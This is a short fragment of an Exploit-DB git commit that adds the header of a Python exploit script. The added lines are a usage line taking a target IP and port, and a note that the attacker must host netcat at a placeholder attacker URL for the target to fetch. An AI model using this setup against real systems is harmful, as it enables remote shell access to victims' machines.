DB: 2016-01-21

This commit is contained in:
Offensive Security 2016-01-21 05:01:43 +00:00
parent bed4bb1cd2
commit 6804f1aa58

View file

@ -15,6 +15,9 @@
#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
import urllib2
import sys